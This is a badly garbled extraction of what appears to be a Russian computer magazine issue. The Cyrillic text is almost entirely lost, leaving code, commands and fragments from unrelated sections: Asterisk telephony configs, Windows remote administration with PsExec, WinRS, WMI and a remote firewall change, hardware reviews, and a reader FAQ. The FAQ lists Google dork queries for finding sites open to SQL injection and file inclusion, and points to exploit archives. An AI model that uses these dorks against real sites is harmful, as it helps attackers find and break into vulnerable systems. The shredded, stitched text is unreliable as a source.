CLI> module load cdr_addon_mysql.so

,
cdr mysql status. Asterisk,
/etc/asterisk/modules.conf
:
load = cdr_addon_mysql.so


Asterisk

System() .
, , Asterisk
. , ,
(, ,
:)).
. winexe (eol.ovh.org/winexe) Windows NT/2k/XP/2k3.
Linux-, Asterisk,
:
exten => s,n,Read(auth||4||1|5)
exten => s,n,GotoIf($["${auth}" = "000"]?yes:no) ;
exten => s,n(yes),System(winexe -U <DOMAIN>/<user>%<password> //<host> "c:\script.bat" >>/var/log/asterisk/win.log)
exten => s,n(no),Hangup()
, script.bat.

,
. MySQL,
. :
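$ sudo nano /etc/asterisk/extensions.conf
; Connect to MySQL: host, user, password, database (the user is the account from the GRANT statement)
exten => _X.,1,MYSQL(Connect connid localhost asteriskuser astpassw asterisk)
; Sum the caller's billed seconds (billsec); the result handle is stored in ${resultid}.
; FILTER keeps only digits, so the caller ID cannot alter the SQL statement
exten => _X.,n,MYSQL(Query resultid ${connid} SELECT SUM(billsec) FROM cdr WHERE src=\'${FILTER(0-9,${CALLERID(num)})}\')
; Fetch the row into billing; found is set to 1 when a row was returned
exten => _X.,n,MYSQL(Fetch found ${resultid} billing)
; Release the result set
exten => _X.,n,MYSQL(Clear ${resultid})
; No row returned: refuse the call
exten => _X.,n,GotoIf($["${found}" = "1"]?check:false)
; Compare the total with the limit, then either place the call or refuse it
exten => _X.,n(check),GotoIf($["${billing}" < ""]?call:false)
exten => _X.,n(call),Dial()
exten => _X.,n,Hangup()
exten => _X.,n(false),Playback(end)
exten => _X.,n,Hangup()
; On hangup, close the MySQL connection
exten => h,1,MYSQL(Disconnect ${connid})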

, SQL-. ,
123:
SELECT SUM(billsec) FROM `asterisk`.`cdr` WHERE src='123'

, , . SQL- . ,
. ,
.
. SQL- , AGI-, .
CDR-. , Asterisk Queue/CDR Log Analyzer (www.micpc.com/qloganalyzer)
Asterisk-Stat (www.areski.net/asterisk-stat-v2).

Asterisk
, . , ,
. ,
, (speed dial), ,
, ,
2-3 . , :
exten => *01,1,Dial(SIP/_@${TRUNK},20)

, :
exten => lenok,1,Dial(SIP/server2/79101234567,20)

. - , . ,

, (
4232), (,
102030), (600000 ).
() 5
(300000 ) (60000
):

exten => _84232102030,1,Dial(SIP/8${EXTEN}@${OUTGOING},,L(600000:300000:60000))


ASTERISK SIP
, .
(recall),
. Asterisk ,
.

*22, Callback *21.
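$ sudo nano /etc/asterisk/extensions.conf
[IncomingCall]
; Remember who is calling whom (the leading underscore makes child channels inherit the variables)
exten => _5XX,1,Set(_To=${EXTEN})
exten => _5XX,n,Set(_From=${CALLERID(num)})
; Store the last caller of the called extension, used by *22
exten => _5XX,n,Set(DB(${To}/LastCaller)=${From})
; Store the last extension the caller dialed, used by *21
exten => _5XX,n,Set(DB(${From}/LastCalled)=${To})
; Place the call
exten => _5XX,n,Dial(SIP/${EXTEN},20)
exten => _5XX,n,Hangup()
; *22: read back the number of the last caller, then dial it
exten => *22,1,Set(tmp=${DB(${CALLERID(num)}/LastCaller)})
exten => *22,n,SayDigits(${tmp})
exten => *22,n,Dial(${tmp},1)
; *21: read back the last dialed number and store a callback request for it
exten => *21,1,Set(tmp=${DB(${CALLERID(num)}/LastCalled)})
exten => *21,n,SayDigits(${tmp})
exten => *21,n,Set(DB(${tmp}/CallBack)=${CALLERID(num)})
exten => *21,n,Hangup()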


(re-dial):
[default]
include => macro-recall
exten => _X.,1,Macro(recall,${EXTEN})
exten => *0,1,DBget(toCall=redial/${CALLERID})
exten => *0,2,Macro(recall,${toCall})
exten => *0,102,Hangup()

[macro-recall]
; Remember the dialed number, dial it, then branch on the dial status
exten => s,1,DBput(redial/${CALLERID}=${ARG1})
exten => s,2,Dial(SIP/${ARG1},20)
exten => s,3,Goto(s-${DIALSTATUS},1)
exten => s-NOANSWER,1,Voicemail(u${ARG1})
exten => s-BUSY,1,Voicemail(b${ARG1})
exten => _s-.,1,Goto(s-NOANSWER,1)

MAKE MENUSELECT APP_FAX

, , ,
Asterisk.

(Call Parking)
(Call Pickup), Asterisk.
Call Parking ,
parkext parkpos
features.conf:
[general]
;
parkext => 700
;
parkpos => 701-720

, ,
(all
hold)
. Call Pickup
*8.


, e-mail!
, ,
, . : ,
. .
IP- (FoIP, Fax over
IP) : .37 T.38.

e-mail
.

. T.38

.
VoIP-
,
: ,
, , ,
IP-,
(
). .38 ,
UDP, TCP
.
UDP,
.
VoIP G.711.
Asterisk .38
:
,
. Asterisk 1.4.20.1
T.38-
SIP-.
: RxFAX/
TxFAX, SendFAX/ReceiveFAX (
SpanDSP, soft-switch.org)
HylaFax + iaxmodem ( , .37).
asterisk-addons
SpanDSP,
G711-.
1.6.0
SpanDSP
( app_fax).
,
,

1.6.2. ,
T.38, Asterisk
G711 T.38. 2009
Digium Fax
For Asterisk (res_fax res_fax_digium, digium.com/en/products/software/faxforasterisk.php),
, IP.
,
( $38.50). 1.8
Asterisk
Fax For Asterisk (
), app_fax.
, ,
. ,
.
, ,
, , ,
Asterisk
SpanDSP. ( libtiff),
Asterisk --with-spandsp.
make menuselect
app_fax ( Applications). :
$ sudo asterisk -r
CLI>core show applications like fax
ReceiveFAX: Receive a FAX
SendFAX: Send a FAX

.
$ sudo nano /etc/asterisk/sip.conf
[general]
t38pt_udptl = yes

:
$ sudo nano /etc/asterisk/extensions.conf
exten => _5,n,Dial(${TRUNK_SIP}/,120,M(sendfax))
; Macro that sends the fax (a macro starts at extension s)
[macro-sendfax]
exten => s,1,Set(FAXFILE=/var/spool/asterisk/fax/fax)
exten => s,n,SendFAX(${FAXFILE}.tif)
exten => s,n,Hangup
; Macro that receives a fax
[macro-receivefax]
exten => s,1,Answer()
exten => s,n,Wait(3)
exten => s,n,ReceiveFAX(faxfilename)

, Asterisk .

Asterisk,

, ,
. ,
,
. z


SYN/ACK
grinder grinder@synack.ru


WINDOWS
, , . ,
, , . .
!
,
WinNT,
.
, , , , Unix ,
.
-
, .
WSH (Windows
Script Host) PowerShell,
WinRS (Windows Remote Shell), MMC
(Microsoft Management Console), WMI (Windows Management
Instrumentation),

RDP (Remote Desktop Protocol).
,

,

, , , .
C
RDP ,
RDP,
,

, , , ,
.. Vista,
-


32 ,
,
(mstsc /span). RDP 7,
Win7/2k8R2, , , Aero,
Direct2D Direct3D .
RDP

Windows ( Windows CE Mobile),
Linux, xBSD, Mac OS X .
, rdesktop
(rdesktop.org)
Win2k8 (
Win2k8R2 ).
Linux rdesktop
Gnome-RDP KDE
Remote Desktop Client.
SeamlessRDP (www.cendio.com/seamlessrdp)

Linux Windows.

,
.
,
.


(
).


, .

. -

,
, ,
, .

Remote Assistance
( ).
,
.
, .
Terminal Server mode ,
.
Win2k8
RDP.
TS RemoteApp (
RemoteApp ) Terminal
Services Web Access ( RemoteApp

).
Win2k8.

RDP-,
( Win2k3SP1,
WinXPSP2 ).

. RDP
VPN,
Terminal Services Gateway.

Win2k Microsoft Remote Command Service (Rcmd.exe).


Rcmdsvc.exe
10 , Rcmd.exe.
Win2k3 Administration Tools Pack,
3 , : ADMgmt.msc ( Active
Directory), PKMgmt.msc ( ), IPAddrMgmt.msc (IP, DHCP, DNS, WINS). Remote Administration
(HTML) IIS - ( 8098). Win2k8
Server Manager, ,
, ,
. ,
Server Manager Win2k8R2. MMC
Win2k8, ,
(RSAT,
Remote Server Administration Tools), Win2k8
. , RSAT
Vista/Win7, Microsoft. C
Vista/Win7
, Win2k3/2k8/2k8R2.
, MMC ,
. (Computer
Management) (Another Computer). , ,
Windows, . , SC
\\synack:

Management (WS-Management Protocol),


XML-.
WinRM WMI- ( ), . HTTP/HTTPS,

, . WinRM
2.0 5985/5986, 47001/TCP. 80/443.
,
, Kerberos ( CredSSP).
.
Win2k8R2 Win7 WinRM 2.0.
WinXPSP3/2k3SP2/VistaSP1/2k8/2k8SP2 Windows Management Framework Core
(Windows PowerShell 2.0, WinRM 2.0, BITS 4.0, support.microsoft.com/kb/968929). .
WinRM ,
:
> winrm quickconfig

, WinRM , 5985/5986,
Windows Firewall. WinRM
80/443, :
> winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
> winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"}

> SC \\synack query type= service state= all

(Task Scheduler) /s,


,
, .

WINRM
WinRM Vista/Win2k8 Microsoft- Web Services for

c ,
winrm enumerate winrm/config/listener
winrm get winrm/config. , - WinRM, 80 , : , WinRM
/wsman, -
URL.

. -


INFO

info
PowerShell

PowerShell

,
2009 .
PowerShell 2.0

Win2k8R2
Win7.

RDP (
3389)
WinNT 4.0 Terminal
Server.
RDP-
Unix Xrdp
(xrdp.sf.net).

,

.

RDP
,
NAT,
UPnP.
RDP
6

,

0,


/console.
Terminal
Services Web Access

,

-,

-.


MMC

Windows
Windows (Computer Configuration Administrative
Templates Windows Components Windows Remote
Management). , WinRS
WinRM. , (Allow automatic
configuration of listeners) IP, .
TrustedHosts:
> winrm set winrm/config/client @{TrustedHosts="synack"}

, , get:
> winrm get winrm/config/client

WinRS.
,
'-r',
:
> winrs -r:synack cmd.exe
> hostname
synack
> ipconfig

SSH-,

. WinRS cmd,
,
winrs help. ,
, cmd:


POWERSHELL
WinRM 2.0,
: -,
HTTP/HTTPS, SSL .. ,
PowerShell Remoting
(
), ,
. PowerShell-, , ,
PowerShell ,
get-help about_signing.
. :
PS C:\> Get-ExecutionPolicy
Restricted


, .
RemoteSigned:
PS C:\> Set-ExecutionPolicy RemoteSigned

.
, PowerShell:
PS C:\> Enable-PSRemoting


( '-Force' ).

WinRM ,
WF ( winrm quickconfig,
Set-WSManQuickConfig), HTTP
WS-Management IP- .
:

> winrs -r:synack "dir C:"


PS C:\> Disable-PSRemoting

HTTP,
HTTPS :


, , Test-WSMan:

> winrs -r:https://synack "tasklist"


PS C:\> Test-WSMan -ComputerName synack.ru

POWERSHELL REMOTING
PowerShell 2.0
Remoting.

PS-
: .

WINRM
, Enter-PSSession, PowerShell :
PS C:\> Enter-PSSession synack.ru

, ,
.
, exit Exit-PSSession.


,
Invoke-Command.
,
( , ). ,
:

HTTP://WWW
links
Windows Management

PS C:\> Invoke-Command -ComputerName synack.ru -ScriptBlock {Get-Service | Format-List}


( ),
. 445 :
PS C:\> $portcommand = {netsh firewall set portopening tcp 445 smb enable}
PS C:\> Invoke-Command -ComputerName synack.ru -ScriptBlock $portcommand

Framework Core
WinXP/2k3/Vista/2008
support.microsoft.com/kb/968929.
Sysinternal
technet.microsoft.com/ru-ru/sysinternals.
Microsoft Script Center
technet.microsoft.com/ru-ru/scriptcenter.

, Netsh
, . set
machine 'r', WINS/UNC/
DNS IP-:

WBEMTEST WMI
> netsh -r synack.ru -u administrator -p password diag gui

HTML- ( , , ),
.

PSEXEC PsExec
,

.
Sysinternals PsTools (technet.microsoft.com/ru-ru/sysinternals).
,
,
%path%
(, system32).
system32\psexesvc.exe, PsExec
( ).
.
:

psexec \\computer -u user -p passwd command

,
.
,
,
.
:
> psexec \\synack cmd.exe

, .
,
, PsExec .
Windows NTLM Kerberos.
,
,
, , :
> psexec @c:\systems.txt shutdown /p /f

. , '-c'

.
'-i'
. PsExec
, , '-d':
> psexec -d \\synack chkdsk


,
.


WINDOWS , WMI

.
, ,
WMI .
,


. ,
,
, ,
Win7, WinXP, ,
.

DCOM
NTLM Kerberos,
, .
WMI MMC-
DCOMCnfg DCOM-,
WMI wmimgmt.msc.
Windows Firewall WMI:
> netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes

, tasklist . :
tasklist /S <> /U
<>\<>

, , , :
> tasklist /S \\synack

WMI . ,
.
Wmic /node. ,
:
> wmic /node:synack /USER:"username" useraccount list brief

,
PsExec,
.
:
> wmic /node:synack process list
> wmic /node:synack process where "ProcessId=679" call terminate

WMI
Windows. Wbemtest.exe, (Remote),
(\\synack\root\cimv2),
.

,
.
,
. , Windows Script Host, .Net

,
.
. z


SYN/ACK
NATHAN BINKERT NAT@SYNACK.RU


Cisco WS-C2960-48TT-L:
2-


Cisco WS-C2960-48TT-L
> :
Auto MDI/MDIX
IEEE 802.1p (Priority tags)
IEEE 802.1q (VLAN)
IEEE 802.1d (Spanning Tree)
IEEE 802.1s (Multiple Spanning Tree)
> / (Flash):
64 / 32
> :
48 x Ethernet 10/100 /

>> SYN/ACK

> Uplink-:
2 x Ethernet 10/100/1000 /

> :
: 13,6 /
: 10,1 /
> :
Web-
SNMP 1,
RMON, Telnet, SNMP
3, SNMP 2c, SSHv2
> :

: 45

> MAC-:
8192

> :

445 x 44 x 236

WS-C2960-48TT-L Cisco ,
.
.
, Cisco WS-C2960-48TT-L
48
. :
,
.

:
c ,
MAC-, ,
Private VLAN Edge
,

NAC (Network Admission Control),


. SPAN (Switch Port
Analyzer)

.
TACACS+
RADIUS.

(QoS Quality of
Service) 64 . IP-
, MAC-,
. ECR, SRR sheduling, WTD,
Strict Priority queuing,
,


(CIR) 8 /. QoS. ,
VoIP
QoS .
uplink-,
GigabitEtherChannel.
Cisco Cluster Management Suite
(CMS).
, SNMP 1,
RMON, Telnet, SNMP 3, SNMP 2c SSHv2.
Web-.

Cisco Network Assistant, .

Express Setup.

66 075 .


1U-:
XServe Quad-Core Intel Xeon Apple


AppleXserve
> :
Quad-Core Intel Xeon 5500
Nehalem 2.26, 2.66 2.93
> :
12
6 ; 1, 2 4
> :
SATA SAS
Apple
3 , 1 7200 rpm
SATA
1.35 , 450
15000 rpm SAS
> RAID:
RAID-
Xserve RAID Card - 512
72 -

>> SYN/ACK

> :
2 Gigabit Ethernet
(10/100/1000BASE-T)
jumbo frames

750
,

> :
16-
PCI Express 2.0:
(6.6
) 9.25-
> -:
2 FireWire 800 (
15 )
2 USB 2.0
1 DB-9 serial

1 USB 2.0
> :
8x SuperDrive
(DVD+R DL/
DVDRW/CD-RW)
NVIDIA
GeForce GT 120 256 GDDR3 SDRAM;
Mini DisplayPort ( VGA
DVI )

4,4
44,7
76,2
14 ;
17,4 SATA
1
> :

> :
750

> :
, 1U

> : Mac OS X Server


10.5 Leopard ( )

,
? ,
Apple
, 1U-.
Xserve Quad-Core Intel Xeon ( ).

-
, .
Quad-Core Intel
Xeon 5500 Nehalem 2.26 .

, 2.26, 2.66
2.93 .
3 12 .
3 SATA- 1 (
SSD-). RAID-
- 512 .
Gigabit
Ethernet (10/100/1000BASE-T)
PCI Express 2.0 ( ).
Xserve , . -, Apple' FireWire
(IEEE 1394b). -, , ,

Mac OS X Server 10.5 Leopard


. -,
NVIDIA GeForce GT 120 256 , , ,
.
. Xserve EFI
(Extensible Firmware Interface)
BIOS, ,

. ,
Linux,
, Windows ,
Win2k8/Win2k8R2. - , 130 000
. z


UNITS

lozovsky@gameland.ru

PSYCHO:

, - , , . ,

, , ,
.

? .
,
,
,
, .


,
, .


,
- ,
,
,
. , ,
, ? , -,


/. , ,
,
.
,
,
(

).
, , ,

. , ,
.
1. .


,
, :
( ,
, , ,
/,
).

, , ,
. ,
,
.
( ,
- ,

, ,
). ,
, ,
.
.
.
, XXI , ,

( :)),
.

.
,
,
- ,
.
, ; (
- )
(
70- :
).
2. . ,
, ,
(, , , )
(, ,
, MMPI) ,
,
. ,
-
, ,
,
? ,
.


, , , , ( )
. , . !


aka
:


. ,


:

.
,
, ,
.
3. .
,


,
,
.
:


.


,

,
, ;
,
, ;
,


. ,

,
,


? ,
,
,

. ,

, ,
,
, , ,
(, , ).
, , ,
,
-
,
,
( +
)
(-, : +
, ). ,
,
. ,
- ,

,
,

:). .
(
) , ,
,

- , .

,

:

:
, ,
. ,
( , 23). ,
( 23 24, ).



.
?
. ,
?

?.
(-) , ,

,
.
, ,
. ?
, ,

,

, .

,

- .
,

.
,

? :)

, ,

,
,
,
,
.
-, ,
:).

:


UNITS

vs. . !
-
.
- (, ,
: 100 ,
).
,
,
:).

- , ,
-.
()
. 6
( ,
). , 2- ,
, -

. ,
, ,
600-
(
), , :
,
(, )
(
);
;
,
(, , ,
, , , );

,
(
),

/,
, ,


,
..
,
( - ),

.
, . ,


,

.

,


.

,
, , ,
( ). (, )
, - ,
( , ,
, ,
). ,
?
( ) .
,
( ,
, ,
, ,
), .
, , ,
.
. , :
. ,
. -


,

, ,
-,
. ,

.
, - .
? !
? !
? ? ?
? , ,
? , !
. . ,
.
,
,
(, , , ),
,
.
,
, . ( ,
ID Software, !),
,
,
, : ,
, , - .
,
. -
,
. , , . ,
,
, ,
,
,
, . !.

: .
!

( .pdb).
, , .
:)
:
1. .

. ,
,
, ,
,
.
2. ,
, , ( ,
),
(
), (-- !), ,
.
3. , .
, ,
,
:).
4. , , ,
, ,
,
,


( ).
5.
.
?

,



.
.


,


() ,
.
,
,
-
, -

? , ,

(
, )

() , , , ,

.

,
,
( )

,
,
. ,
,
:)
.
, -
-
, ,

,
, ,

, , ,
.
. ,

,

: : ,
, VIP, , , , ,
100% ! :)

( ,
,
)

.

,

PSYCHO
. , ,
, :).
.
, .
,
()
,

.
, ,

.

.
.
,
,
, ,
,


, . , !
.
,
,
,
.
.
, , , -

.


?

,
. , ,
,
. ,
,

. ,
,
. ,

,

, ,
,

,
.

!,

.
.

,



. ,
-

,
:). . z


UNITS

Step twitter.com/stepah

faq
united
@real.xakep.ru

, - ?
? faq@real.xakep.ru
!
: 4G USB- Samsung SWC-U200 Mobile
WiMAX YOTA.
Q: .
CMS ?
A: , ,

-,
- .

( CMS
),

tutsplus.com.
1. WordPress
(wordpress.org; 116,000,000
powered by wordpress);
2. Drupal ,
whitehouse.gov
(drupal.com;
inurl:node/N,
N );
3. Joomla! (joomla.org; 22,000,000 );
4. ExpressionEngine ,


(www.expressionengine.com; 3,530,000 );
5. TextPattern (textpattern.com;
500k );
6. Radiant CMS ,
CMS (radiantcms.org; 400k );
7. Cushy CMS ,
HTML

(www.cushycms.com; 200k );
8. SilverStripe , -
WordPress (www.silverstripe.org; 160k
);
9. Alfresco JSP (www.alfresco.com; 100k
);
10. TYPOlight (www.typolight.org; 100k
).
,
CMS ( ),

:).
P.S.
: php.opensourcecms.com, cmslist.ru, cmsmatrix.org Open Source
sourceforge.net.
Q: . jQuery
Prototype. ?
A:
jQuery
noconflict-mode. ,
, :

<html>
<head>
  <script src="prototype.js"></script>
  <script src="jquery.js"></script>
  <script>
    jQuery.noConflict();
    // Use jQuery via jQuery(...)
    jQuery(document).ready(function(){
      jQuery("div").hide();
    });
    // Use Prototype with $(...), etc.
    $('someid').hide();
  </script>
</head>
<body></body>
</html>


jQuery http://docs.jquery.com/Using_jQuery_with_Other_Libraries.
Q: ,
milw0rm.com?
A: -

, explo.it
( www.exploit-db.com)
. ,
milw0rm.com,
:
Remote Exploits ( );
Local Exploits ( );
Web Applications ( -);
DoS/PoC ( );
Shellcode (-);
Papers ();
Search ();
D (
);
Submit ( );
Rss (
).

: securityfocus.com securitylab.ru.
Q: ,
.
A: ! (dorks),
:
1. SQL-:

inurl:".php?id="
inurl:".php?cat="
inurl:".php?catid="
inurl:".php?num="
inurl:".php?bid="
inurl:".php?pid="
inurl:".php?nid="
inurl:".php?avd="
inurl:".php?file="

2. Local File Inclusion/Remote File Inclusion:


inurl:".php?pagina="
inurl:".php?inc="
inurl:".php?include_file="
inurl:".php?page="
inurl:".php?show="
inurl:".php?cat="
inurl:".php?file="
inurl:".php?path_local="
inurl:".php?phpbb_root_dir="
inurl:".php?path_pre="
inurl:".php?nic="
inurl:".php?sec="
inurl:".php?content="
inurl:".php?link="
inurl:".php?filename="
inurl:".php?dir="
inurl:".php?document="
inurl:".php?view="
inurl:".php?sel="
inurl:".php?locate="
inurl:".php?place="
inurl:".php?layout="
inurl:".php?go="
inurl:".php?catch="
inurl:".php?mode="
inurl:".php?name="
inurl:".php?loc="
inurl:".php?f="
inurl:".php?inf="
inurl:".php?pg="
inurl:".php?load="
inurl:".php?naam="


, :).

Q: WebMoney, ?
A: WebMoney .
:
1. . WebMoney ,
files.webmoney.ru.
,


.
2.
, ,
, , ,
-.
gamelot.ru.
3. Digiseller.ru,
-.
4. (Software
activation service) ,
.
www.softactivation.com/asp/about.asp.
5. WM-,
.
: trust.webmoney.ru.

Q: , PHP
e-mail?

Q: , *nix- , touch.
?
A: , touch
(mtime)
,
. ,
touch ,
,
, ctime (Change
Time)
(, ,
, ..). ,


find
:

"find [] -ctime -1".

,
.
: www.krazyworks.com/changing-time www.securiteam.com/tools/5JP0H2K7FE.html.
P.S.
(Dm).
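
The answer above relies on the fact that touch can set mtime to an arbitrary value while ctime still records when that change was made, and it searches with find and -ctime. The following added example, which is not from the magazine, goes one step further and lists files whose ctime is much newer than their mtime, optionally limited to recently changed files. It assumes GNU find (for -printf); backdated_files and its arguments are illustrative names.

```shell
#!/bin/sh
# Added example, not from the article. Requires GNU find (-printf).
# backdated_files and its arguments are illustrative names.

# Usage: backdated_files DIR [GAP_SECONDS] [DAYS]
#
# Prints regular files under DIR whose inode change time (ctime) is more
# than GAP_SECONDS newer than their modification time (mtime). touch can set
# mtime to any value, but the kernel stamps ctime with the real time of that
# change, so a backdated file shows an old mtime next to a fresh ctime.
# With DAYS set, only files whose ctime lies within the last DAYS days are
# examined, which is the "find ... -ctime -N" search from the answer.
# File names containing tabs or newlines are not handled.
backdated_files() {
    dir=$1
    gap=${2:-86400}
    days=$3

    if [ -n "$days" ]; then
        set -- "$dir" -type f -ctime "-$days"
    else
        set -- "$dir" -type f
    fi

    # %T@ is mtime and %C@ is ctime, both in seconds since the epoch.
    find "$@" -printf '%T@\t%C@\t%p\n' 2>/dev/null |
        awk -F '\t' -v gap="$gap" '$2 - $1 > gap { print $3 }'
}
```

ctime also moves on chmod, chown and rename, so a hit is a lead for further inspection rather than proof that a timestamp was forged.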

A:

:

<?php
// Message parameters
$subject = ' ';
$message = ' ';
$from_name = ' ';
$from_mail = ' ';
$to = ' ';
$priority = 1; // X-Priority value (1 is the highest)
// Build the body and the headers
$body = "$message\n";
$from = "$from_name <$from_mail>";
$headers = "Content-Type: text/html; charset=windows-1251\n";
$headers .= "From: $from_mail\n";
$headers .= "X-Mailer: The Bat! 2005\n";
$headers .= "X-Priority: $priority\n";
// Send the message
mail($to,$subject,$body,$headers);
?>


UNITS

Q: -

Q:

, open-source!

Yota ,

A: ,

A:

WiMax- Wi-Fi?


[Life]: http://forum.antichat.ru/thread169495.html.
:
;
;
;
;
site.com/string;
subdomen.site.com.
, http://tinyurl.com.

A:


:
BDDBot (www.twmacinta.com/bddbot)
, ,
,
;
Sphider (www.sphider.eu)
PHP,
-, MySQL;
OpenWebSpider (www.openwebspider.org)
, ,
.
Nutch (lucene.apache.org/nutch)
Java;
XQEngine (xqengine.sourceforge.net) , XML-.

Q: SMS-

, , ..
, .
,
.
, ,

: Yota,
,
Interbro KWI B2200 .
,
Yota (192.168.1.1),

192.168.1.254,
.
, , , admin/admin, ,
Wi-Fi,
Yota.
, , Wi-Fi (
),
.

,
.
.

. , ,
(

Q: JS (-).

, ,

). : -

, ?

, ,

A: , , -

- ?

,
, : http://mtt.ru/info/def/index.wbp.
DEF (910, 903 ..),
, , , . .
,

. :
XML-.

A: ,

Q:

- ,
OWASP (www.owasp.org),
,
.
OWASP ESAPI4JS (http://code.google.com/p/owasp-esapi-js).
,
,
, ,
JS-.
, ESAPI4JS
.

Q: - Windows
,
?
A: , -,
Windows 7. :
: gpedit.msc;
User Configuration\
Administrative Templates\System;
System Run only;
Enable ,
Options, Show
List of allowed applications;
,

.
, , ,

, Applocker,
Windows 7.

Q: ,
.
0 , 1
, .. ,

SMS , -

Q: - .

. -

: ,

:).

\u4241\u2743\u0D22\u000A, , , \x41\x42\x43\x27\x22\x0D\x0A\x00?

, ,

A: BETA3 (http://code.google.com/p/beta3), -
, 16 , .
.

A: Asterisk (www.asterisk.org).
,
. ,
IVR- (Interactive Voice Response),
,
, , .
20 ,

.
http://nag.ru/news/17515. z

A: , . ,

,
: Unlocker Dr.Web
(www.drweb.com/unlocker/index) Deblocker
(support.kaspersky.ru/viruses/deblocker). ,
SMS,

.


Q: - Google-,
.


>Multimedia
AmoK Exif Sorter 2.56
Asynx Planetarium 2.61
Celestia 1.6.0
DeskScapes
doPDF 7.1.326
Girder 5.0.10
Graffiti Studio
IcoFX 1.6.4
INKSAVER 2.0
Juice 2.2
Miro 2.5.4
Photocopier 3.05
TipCam 2.2
VideoCacheView 1.53

>Misc
Blue Lock 1.92
Ceedo Personal 3.1.0.22
Dicto 3 Beta
DocList Uploader 1.1
Eastegger 5.6.0.536
google docs upload 1.3.1
MojoPac 2.0
Partition Find and Mount 2.31
Portable Start Menu 3.0
Stick 2.8.0.82
TheSages English Dictionary and
Thesaurus 3.1.2
ToDoList 6.0.8
VirtuaWin 4.1
WinMerge 2.12.4
4.5

>Games
Mario Forever 4.4
Scorched3D Version 43beta
Soldat 1.5

>>WINDOWS
>>Development
>Development
3rdRail 2.0
Aptana RadRails 2.0.2
Arachno Ruby IDE 0.7.13
Arcadia 0.8.0
Axure RP Pro 5.6
DreamCoder for MySQL 5.1
DreamCoder for Oracle 4.0
DreamCoder for PostgreSQL 2.0
FreeRIDE 0.9.6
haXe 2.05
IronRuby 1.0-rc1
Komodo Edit 5.2.4
qt4-qtruby 2.0.3
Ruby 1.9.1
Ruby DBI 0.4.3
Ruby In Steel Developer 2008 1.4
Ruby on Rails 2.3.4
Ruby-GNOME2 0.19.3
RubyGems 1.3.5
SlickEdit 2009
Treebeard XSLT IDE 0.9.5 Beta
TurboRuby 1.2
wxRuby 2.0.1

>>UNIX
>Desktop
aTunes 1.13.6
Audacious 2.2.0
Discwrapper 1.2.2

>System
Auslogics System Information 1.5.20
Boot-US 2.1.7
Crucial System Scanner
EASEUS Partition Master
Professional Giveaway 4.1.1
GhostWall FireWall 1.150
Kerio WinRoute Firewall 6.7.1
KeyScrambler Personal 2.6.0
muCommander 0.8.4
Pandora Recovery 2.1.1
Process Tamer 2.11.01
Returnil Virtual System 2010 Home
Free 3.1.7779
Sandboxie 3.42
TeraCopy 2.1
Unknown Device Identifier 7.00
Video Memory stress Test 1.7
What Changed 1.06
Wubi 9.100

>Security
BotHunter 1.5
Code Crawler 2.5.1
dirb 1.8
ESAPI for .Net 0.2
ESAPI for Java 2.0 rc4
ESAPI on Python 1.0
GMER 1.0.15
KeePass 2.09
ncrack 0.01
Nmap 5.21
OWASP ESAPI for PHP 1.0a
Scapy last
SecuBat v0.5
SpotAuditor 3.9.3
Technitium MAC Address Changer
5.0R3
The Dude 3.5
Windows File Analyzer 1.0.0
Wireshark 1.2.6
WITOOL 0.1

>Net
Deluge 1.2.0
digsby Build 75
Kiwi CatTools 3.4.0
Lastpass 1.64.4
Medieval Bluetooth Network
Scanner 1.4
Nemesis 1.4
OpenVPN 2.1.1
PrinterShare 2.1.2
SRWare Iron 4.0.280
Whisher for Windows 7.04
WirelessMon 3.1
. 3.0.3

VideoInspector 2.2.3.122

>Security
BotHunter 1.5.0
Chaosreader 0.94

>Net
Aria2 1.8.0
AsItHappens 0.57
Claws Mail 3.7.4
DCsharp 0.11.1
Deluge 1.2.0
Gajim 0.13.2
Mozilla Firefox 3.6
Netkit 2.7
NetworkManager 0.7.2
Opera 10.50
SABnzbd 0.4.12
SIM 0.9.4.3
Skype 2.1.0.81
Smuxi 0.7
Transmission 1.82
Twitux 0.69
Vacuum IM 1.0.0
WeeChat 0.3.1
Wicd 1.7

>Games
Danger from the deep 0.3.0

>Devel
Aptana Studio 2.0
Armadillo 0.8.2
Bazaar 2.0.4
BuildBot 0.7.12
Ceno 0.0.2
Clojure 1.1
Erlang R13B03
FreePascal 2.4
GCC 4.4.3
GHC 6.12.1
libxml2 2.7.6
NetBeans 6.8
OpenSwing 2.1.4
Poco 1.3.6p2
Premake 4.2
Ptex 2.0.0
Python 2.6.4
RabbitVCS 0.12.1
Selenium IDE 1.0.2
Subversion 1.6.9

Easystroke 0.4.11
EasyTag 2.1
Emelfm2 0.7.1
File Roller 2.24.3
Gimp 2.6.8
GNOME Do 0.8.2
Inkscape 0.47
Istanbul 0.2.2
LMMS 0.4.6
Metamorphose 1.1.2
Meteorite 0.10 Beta
QtiPlot 0.9.7.11
Unison 2.32.52
VLC 1.0.4
Wink 1.5

>X-Distr
BackTrack 4
Frenzy 1.2

>System
AMD Catalyst 10.1
AWStats 6.95
Bacula 5
Diskman 0.9.7
Gzip 1.4
Linux Bluetooth Remote Control
0.8.6
Linux Kernel 2.6.32.7
Lm-sensors 3.1.1
NTFS-3G 2010.01.16
NVClock 0.8
nVidia 190.53
PackageKit 0.6
QEMU 0.12.2
Rovclock 0.6e
Ubuntu Tweak 0.5
VirtualBox 3.1.2
Wine 1.1.37

>Server
ADCH++ 2.4
Apache 2.2.14
Apache Tomcat 6.0.24
BIND 9.6.1-P3
CUPS 1.4.2
DHCP 4.1.1
IMAPFilter 2.2.2
MySecureShell 1.15
OpenLDAP 2.4.21
OpenSSH 5.3
OpenVPN 2.1.1
Postfix 2.6.5
PostgreSQL 8.4.2
Samba 3.4.5
Sendmail 8.14.4
Snort 2.8.5.2
Squid 3.0 STABLE21
Stunnel 4.30
Tinyproxy 1.8.0

Clamav sniffer 0.7


Dirb 2.03
Distributed Hash Cracker 3
Fakeroute 0.3
Fierce Domain Scan
Fimap 0.7 alpha
Firewalk 5.0
Ngrep 1.45
Nmap 5.21
Onesixtyone 0.3.2
Porkbind 1.3
PulledPork 0.3.4
SPIKE Proxy
SSLstrip 0.7
Tor 0.2.1.22
Tor-ramdisk
WAFP 0.01
Wireshark 1.2.6
Yasat 207


UNITS

HTTP:// WWW2

prostopleer.com

, , -,
, , -, (
), . (
) , -
- . -,
. !

IT-

ping
traceroute

WIPMANIA

www.wipmania.com
, , - -
, justping.com,
( , , ).
: WIPmania .
traceroute, whois DNS.
Firefox, WIPmania API.

IT-EVENT

ALGORITHMATIC

,
